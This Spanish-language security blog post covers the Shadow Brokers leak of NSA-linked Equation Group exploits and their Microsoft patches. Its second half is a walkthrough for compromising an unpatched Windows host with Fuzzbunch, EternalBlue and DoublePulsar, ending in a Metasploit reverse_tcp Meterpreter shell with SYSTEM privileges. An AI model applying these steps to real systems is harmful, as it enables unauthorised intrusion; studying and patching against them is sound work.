El pasado viernes 14 de Abril, The Shadow Brokers publicó una gran cantidad de herramientas pertenecientes al arsenal de Equation Group s (sospechosamente vinculado a la NSA). Se puede encontrar dichas herramientas en el repositorio de Github de misterch0c.

El grupo Shadow Brokers libera una nueva hornada de exploits de la NSA

Ya se han comenzado a explotar las herramientas de hacking de la NSA filtradas el fin de semana pasado por ShadowBrokers y esto se ve facilitado porque hay cientos o miles de sistemas Windows vulnerables y expuestos a Internet.

El conjunto de herramientas de hacking está orientado a Windows XP, Windows Server 2003, Windows 7 y 8 y Windows 2012. Microsoft lpublicó los parches para todas las vulnerabilidades explotadas, pero aún existen riesgos en sistemas no compatibles, así como con aquellos que aún no han instalado los parches.

• ETERNALROMANCE — Remote privilege escalation (SYSTEM) exploit (Windows XP to Windows 2008 over TCP port 445)
• ENTERNALCHAMPION, ETERNALSYSTEM — Remote exploit up to Windows 8 and 2012
• ETERNALBLUE — Remote Exploit via SMB & NBT (Windows XP to Windows 2012)
• EXPLODINGCAN — Remote IIS 6.0 exploit for Windows 2003
• EWORKFRENZY — Lotus Domino 6.5.4 and 7.0.2 exploit
• ETERNALSYNERGY — Windows 8 and Windows Server 2012

EASYBEE appears to be an MDaemon email server vulnerability [source, source, source]
EASYPI is an IBM Lotus Notes exploit [source, source] that gets detected as Stuxnet [source]
EWOKFRENZY is an exploit for IBM Lotus Domino 6.5.4 to 7.0.2 [source, source]
EXPLODINGCAN is an IIS 6.0 exploit that creates a remote backdoor [source, source]
ETERNALROMANCE is a SMBv1 exploit over TCP port 445 which targets XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2, and gives SYSTEM privileges [source, source]
EDUCATEDSCHOLAR is a SMB exploit [source, source]
EMERALDTHREAD is a SMB exploit for Windows XP and Server 2003 [source, source]
EMPHASISMINE is a remote IMAP exploit for IBM Lotus Domino [source, source]
ENGLISHMANSDENTIST sets Outlook Exchange WebAccess rules to trigger executable code on the client's side to send an email to other users [source, source]
ERRATICGOPHER is a SMBv1 exploit targeting Windows XP and Server 2003 [source, source]
ETERNALSYNERGY is a SMBv3 remote code execution flaw for Windows 8 and Server 2012 [source, source, source]
ETERNALBLUE is a SMBv2 exploit [source]
ETERNALCHAMPION is a SMBv1 exploit [source]
ESKIMOROLL is a Kerberos exploit targeting 2000, 2003, 2008 and 2008 R2 domain controllers [source, source]
ESTEEMAUDIT is an RDP exploit and backdoor for Windows Server 2003 [source, source]
ECLIPSEDWING is an RCE exploit for the Server service in Windows Server 2008 and later [source, source]
EXPANDINGPULLEY is another Windows implant [source]
GROK is a keylogger for Windows, also known about since Snowden [source]
ETRE is an exploit for IMail 8.10 to 8.22 [source]
FUZZBUNCH is an exploit framework, similar to MetaSploit [source, source], which was also part of the December-January "Windows Tools" Shadow Brokers auction [source]
DOUBLEPULSAR is a RING-0 multi-version kernel mode payload [source]
PASSFREELY is a tool that bypasses authentication for Oracle servers [source]
EquationGroup had scripts that could scrape Oracle databases for SWIFT data [source, source]
ODDJOB is an implant builder and C&C server that can deliver exploits for Windows 2000 and later [source, source], also not detected by any AV vendors [source]
Metadata [possibly faked, possibly real] links NSA to Equation Group [source]
NSA used TrueCrypt for storing operation notes [source]
Some of the Windows exploits released today were undetectable on VirusTotal [source]
Some EquationGroup humor in the oddjob instructions manual [source, source]
JEEPFLEA_MARKET appears to be an operation for collecting data from several banks around the world [source], previously linked to the NSA by Snowden [source, source]
The Equation Group targeted EastNets, a SWIFT connectivity provider [source, source, source, source, source]

De todos los exploits disponibles, el que más ha llamado la atención a la comunidad ha sido el combo del llamado Eternalblue + Doublepulsar.

Exploit - Parches de Microsoft

• “EternalBlue” - MS17-010
• “EmeraldThread” - MS10-061
• “EternalChampion” - CVE-2017-0146 & CVE-2017-0147
• “ErraticGopher” Addressed prior to the release of Windows Vista
• “EsikmoRoll” - MS14-068
• “EternalRomance” - MS17-010
• “EducatedScholar” - MS09-050
• “EternalSynergy” - MS17-010
• “EclipsedWing” - MS08-067

Módulos Metasploit

 Eternalblue & Doublepulsar

DoublePulsar es una puerta trasera (backdoor) utilizada para inyectar y ejecutar código malicioso en sistemas ya infectados, y se instala utilizando la vulnerabilidad EternalBlue que se dirige a los servicios de intercambio de archivos SMB en Windows (puerto 445). Para comprometer una máquina, se debe estar ejecutando una versión vulnerable del sistema operativo Windows con servicio SMB expuesto.

Múltiples investigadores de seguridad han realizado análisis en masa en los últimos días y han encontrado decenas de miles de computadoras Windows en todo el mundo infectadas con DoublePulsar, el implante espía de la NSA. Los investigadores han publicado una herramienta gratuita en GitHub para que cualquiera pueda usarla.

• https://github.com/countercept/doublepulsar-detection-script

Se ha publicado en GitHub un script, llamado doublepulsar-detection-script, pensado, como su nombre indica, para detectar esta backdoor de la NSA y eliminarla de los ordenadores.


Sheila A. Berta (@UnaPibaGeek) de ElevenPaths publicó en Exploit-DB un paper, también con versión en inglés, en el que se explica cómo explotar la vulnerabilidad Eternalblue & Doublepulsar para obtener una Shell apoyándose en Powershell Empire para lograr, posteriormente, un Meterpreter de Metasploit.

EXPLOTAR ETERNALBLUE & DOUBLEPULSAR PARA OBTENER UNA SHELL DE EMPIRE/METERPRETER EN WINDOWS 7/2008

¿Por qué Eternalblue & Doublepulsar? La respuesta es sencilla, ya que entre los exploits que se publicaron, Eternalblue es el único que se puede utilizar para atacar sistemas Windows 7 y Windows Server 2008 R2 sin necesidad de autenticación. Por lo que, Eternalblue es el exploit que nos permitirá aprovecharnos de un fallo de seguridad en el protocolo SMB para que, posteriormente, Doublepulsar pueda inyectar remotamente, por ejemplo, una DLL, ya que existen otras posibilidades.

Framework Fuzzbunch: el "Metasploit" de la NSA

Fuzzbunch ha sido el nombre de este framework con múltiples exploits de windows. Bautizado como "El mestasploit de la nsa". Programado en python 2.6  utiliza una versión antigua de pywin32.

Dependecias de Fuzzbunch

• Python 2.6
• Pywin32
• Java.

Sólo funciona para equipos 32 bits, ya que se compilan para una arquitectura x86 ya que las fuentes de los binarios no están disponibles. No funciona en 64 bits.

Se debe descargar el repositorio del git donde se han publicado los exploits y herramientas.

Exploits de Fuzzbunch

• Easybee-1.0.1.exe
• Easypi-3.1.0.exe
• Eclipsedwing-1.5.2.exe 
• Educatedscholar-1.0.0.exe
• Emeraldthread-3.0.0.exe
• Emphasismine-3.4.0.exe 
• Englishmansdentist-1.2.0.exe
• Erraticgopher-1.0.1.exe
• Eskimoroll-1.1.1.exe
• Esteemaudit-2.1.0.exe
• Eternalromance-1.3.0.exe
• Eternalromance-1.4.0.exe
• Eternalsynergy-1.0.1.exe
• Ewokfrenzy-2.0.0.exe 
• Explodingcan-2.0.2.exe
• Eternalblue-2.2.0.exe
• Eternalchampion-2.0.0.exe

Se puede hacer con un “git clone” o descargando el repositorio directamente: 

git clone https://github.com/x0rz/EQGRP_Lost_in_Translation

Una vez clonado el repositorio en nuestro equipo, habrá que acceder al directorio Windows que está dentro de EQGRP_Lost_in_Translation y crear la carpeta listeningposts. Si no hacemos esto, al intentar ejecutar Fuzzbunch nos saltará un error avisando de que no encuentra el directorio.

Para poder ejecutar el framework correctamente y sin ningún error se necesita de una versión antigua de Python y de Pywin32:

1. Python 2.6.6 de 32bits (se ha probado con Python 2.7 y no funciona).
2. PyWin32-221 para Python 2.6.6.
3. Jre-6u15-windows-i-586.

Una vez esté todo instalado vamos a pasar a la acción. Aquí utilizaremos powershell pero también se puede hacer mediante cmd.

Desde el directorio EQGRP_Lost_in_Translation/windows ejecutamos Python fb.py para acceder al framework, e introducimos los siguientes parámetros:

• Default Default target IP Addres [] : IP de la víctima.
• Dafault Callback Addres [] : IP de nuestra máquina Windows.
• Use redirection[yes] : Establecer a ‘no’.
• Base Log directory [D:\logs] : Establecer la ruta para almacenar los logs.

Acto seguido hay que crear un proyecto. Una vez realizados estos pasos, veremos en el prompt fb>



These plugins are dispatched into several categories:

• Information gathering of the target and discovery of exploitable vulnerabilities: Architouch, Rpctouch, Domaintouch, Smbtouch, etc. ;
• Exploiting vulnerabilities: Emeraldthread, Eclipsedwing, Eternal*, etc. ;
• Post-exploitation after infection of the target: DouplePulsar, Regread, Regwrite, ...

fb> Show Exploit

 Eternalblue se encarga de crear un backdoor y Doublepulsar inyecta una dll en el proceso del sistema que queramos.

fb > use Eternalblue

Con la backdor creada con Eternalblue, el próximo paso a realizar es inyectar una dll en un proceso del sistema comprometido haciendo uso de Doublepulsar.

Para generar la dll podemos hacer uso de msfvenom:


Y desde metasploit dejar un handler esperando a recibir una conexión desde la máquina comprometida:

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

Si lo hemos hecho todo bien, tendremos en nuestro equipo local un meterpreter con privilegios SYSTEM sobre la máquina virtual víctima. Con unos sencillos pasos y un par de clicks hemos llegado a comprometer un equipo conociendo solo su dirección IP.

Fuentes:
http://www.elladodelmal.com/2017/04/hackear-windows-7-2008-r2-con.html
http://blog.segu-info.com.ar/2017/04/herramienta-para-detectar-doublepulsar.html
http://blog.segu-info.com.ar/2017/04/integracion-de-eternalblue-y.html
https://www.securityartwork.es/2017/04/21/shadow-brokers-explotando-eternalblue-doublepulsar/
https://zerosum0x0.blogspot.com.es/2017/04/doublepulsar-initial-smb-backdoor-ring.html